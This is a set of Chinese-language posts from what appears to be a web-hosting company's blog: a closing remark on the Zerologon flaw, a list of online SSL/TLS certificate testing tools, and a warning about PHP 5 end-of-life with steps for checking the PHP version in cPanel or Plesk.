對此，陳仲寬推測，實作此部分軟體的人，可能並不熟悉密碼學，也沒有深入去探討固定IV的風險，因此造成此次漏洞。他認為，即使是一般程式設計師，也需要有基本資安的概念。

資料來源: iThome 為何發生Zerologon漏洞？軟體實作不當 https://www.ithome.com.tw/news/140582

The post 為何發生Zerologon漏洞？軟體實作不當 first appeared on 捕夢網 Blog.

這幾年來，幾家科技大廠包含Google等在內，致力於推動為網站安裝SSL，作為資訊安全的第一步。

SSL憑證是否有正確安裝？是否有漏洞？當然如果您的憑證是由專業的工程師或主機商協助安裝，那基本是安全無虞的

捕夢網接下來要介紹幾個網站，只需輸入網站，即可幫您驗證SSL憑證是否有正確安裝？是否有漏洞？

1. SSL Labs

SSL Labs by Qualys is one of the most popular SSL testing tools to check all latest vulnerability & misconfiguration. Ex:

SSL Labs為目前最常被使用用來檢測SSL憑證的網站之一

2. SSL Checker

SSL Checker let you quickly identify if a chain certificate is implemented correctly. Great idea to proactively test after SSL cert implementation to ensure chain certificate is not broken.

SSL Checker可以快速確認Chain Certificate是否安裝正確

3. Geekflare

Geekflare提供兩種檢測工具

TLS Test – quickly find out which TLS protocol version is supported. As you can see, the tool is capable of testing the latest TLS 1.3 as well.

TLS Test是用來檢測TLS protocol是否太舊或不安全的用的

TLS Scanner – detailed testing to find out the common misconfiguration and vulnerabilities.

TLS Scanner則可以詳細檢測常見的設定錯誤或是漏洞是否存在

4. Wormly

Web Server Tester by Wormly check for more than 65 metrics and give you a status of each including overall scores. The report contains certificate overview (CN, Expiry details, Trust chain), Encryption Ciphers details, Public key size, Secure Renegotiation, Protocols like SSLv3/v2, TLSv1/1.2.

Wormly涵跨了65種檢測指標，會針對網站整體狀態給出評價

5. DigiCert

DigiCert SSL Installation Diagnostics Tool is another fantastic tool to provide you DNS resolves IP address, Certificate details including Issuer, Serial number, key length, signature algorithm, SSL cipher supported by the server and expiry details.

DigiCert可以提供DNS IP解析，還包含憑證發行者，金鑰，簽章等

6. SSL Server Security Test

Useful tool by High-Tech Bridge to perform scan against your https URL and provide in-depth technical information with an option to download the report in PDF format.

SSL Server Security Test讓您可以下載檢測報告，仔細檢測哪裡是否需要改善

7. Observatory

Observatory by Mozilla checks various metrics like TLS cipher details, certificate details, OWASP recommended secure headers, and more.

Observatory則是由火狐瀏覽器開發公司所提供的檢測工具

8. CryptCheck

CryptCheck quickly scans the given site and show score for protocol, key exchange, and cipher. You get detailed cipher suites details so can be handy if you are troubleshooting or validating ciphers.

CryptCheck則會告訴你關於套件的詳細訊息，那讓您在修正錯誤更加快速

資料參考來源: https://geekflare.com/ssl-test-certificate/#SSL-Server-Security-Test

The post 驗證SSL憑證是否有正確安裝？是否有漏洞？ first appeared on 捕夢網 Blog.

較新版的php 7.0同時將於2018年12月起停止支援，不再提供安全性更新。php 7.1版也將在12月停止主要更新，2019之後結束安全更新。

假設駭客發現並利用了php舊版本的漏洞，全世界幾百萬網站及數不清的網站用戶將會陷入風險當中。

php官方網站的支援版本及時程表：

資料來源：php官方網站

根據國外網路科技應用的調查公司W3Techs統計指出，在他們研究的網站樣本中，使用php比例高達78.9%，而使用php5 (包含5.6及更舊的版本)的網站比例又占了60.7%。資料來源：調查公司W3Techs

這代表您的網站如果是用php 5.6或更舊的版本寫成的，明年2019年1月1日起，將被停止支援安全性更新，屆時陷入被駭或被植入惡意程式的風險。

捕夢網提醒您

請即刻查看您所使用的php版本，如需升級請立即更新。或洽捕夢網客服或業務，我們將協助您應對。

如何查看你的php版本

如果你使用的虛擬主機後台是 cpanel 管理介面

登入帳密→點「多 PHP 管理器」→即可查看php版本

如果你使用的虛擬主機後台是 plesk  管理介面

登入帳密→點「PHP 設定」→即可查看php版本

The post 邁向生命末了，php 5年底終止安全更新。幾百萬網站恐陷入風險。 first appeared on 捕夢網 Blog.